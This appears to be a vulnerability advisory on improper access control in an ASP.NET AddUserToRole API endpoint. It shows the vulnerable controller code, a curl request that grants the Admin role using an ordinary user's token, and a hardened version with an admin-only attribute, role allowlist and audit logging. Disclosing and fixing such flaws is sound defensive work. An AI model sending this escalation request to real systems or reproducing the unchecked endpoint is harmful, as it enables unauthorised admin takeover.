Improper access control on the API endpoint AddUserToRole
allows a regular user to escalate their privileges to admin.
    // Vulnerable action: any authenticated user in the User role may call it
    [Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
    {
        // The requested role is passed straight through without validation
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }
As shown, the endpoint only requires the User role to be called, and there is no check on which role may be added, so the caller can request the Admin role for any account, including their own.
    curl -X 'POST' \
      'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
      -H 'accept: */*' \
      -H 'Authorization: <TOKEN>' \
      -d ''
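A hardened form of the same action, written here as an added example and not taken from the affected project: the endpoint is restricted to administrators, the requested role is checked against an explicit allowlist that excludes Admin, and every role change is logged with the identity of the caller. The controller name, the IAuthService interface, the Roles.Admin constant and the ILogger usage are assumptions; only Roles.User and AddUserToRoleAsync appear in the original code.

```csharp
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Logging;

// Assumed project types (hypothetical names): a Roles constants class with
// Roles.User and Roles.Admin, and an IAuthService exposing AddUserToRoleAsync.
[ApiController]
[Route("Auth")]
public class AuthController : ControllerBase
{
    private readonly IAuthService _auth;
    private readonly ILogger<AuthController> _logger;

    // Roles that this endpoint is allowed to grant. Admin is deliberately absent:
    // promotion to Admin should go through a separate, more tightly controlled path
    // (or be done out of band), so even an administrator cannot mint admins here.
    private static readonly HashSet<string> AssignableRoles =
        new HashSet<string>(StringComparer.Ordinal) { Roles.User };

    public AuthController(IAuthService auth, ILogger<AuthController> logger)
    {
        _auth = auth;
        _logger = logger;
    }

    // Only administrators may change role membership at all.
    [Authorize(Roles = Roles.Admin)]
    [HttpPost("AddUserToRole")]
    public async Task<IActionResult> AddUserToRole(
        [FromQuery] string username,
        [FromQuery] string role)
    {
        if (string.IsNullOrWhiteSpace(username) || string.IsNullOrWhiteSpace(role))
            return BadRequest("username and role are required");

        var caller = User.Identity?.Name ?? "<unknown>";

        // Reject any role not on the allowlist, regardless of who is asking.
        if (!AssignableRoles.Contains(role))
        {
            _logger.LogWarning(
                "Rejected role assignment: caller={Caller} target={Target} role={Role}",
                caller, username, role);
            return Forbid();
        }

        var results = await _auth.AddUserToRoleAsync(username, role);

        // Audit every attempt, successful or not, so privilege changes are traceable.
        _logger.LogInformation(
            "Role assignment: caller={Caller} target={Target} role={Role} success={Success}",
            caller, username, role, results.IsSuccess);

        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }
}
```

Two independent controls are applied on purpose: the [Authorize(Roles = Roles.Admin)] attribute decides who may call the endpoint, while the AssignableRoles allowlist decides what the endpoint can do even for an authorised caller. With both in place, the request shown in the curl above is rejected twice over, first because a User-role token no longer satisfies the attribute, and second because "Admin" is not an assignable role. The warning log line gives defenders a concrete event to alert on when someone probes the endpoint with a disallowed role.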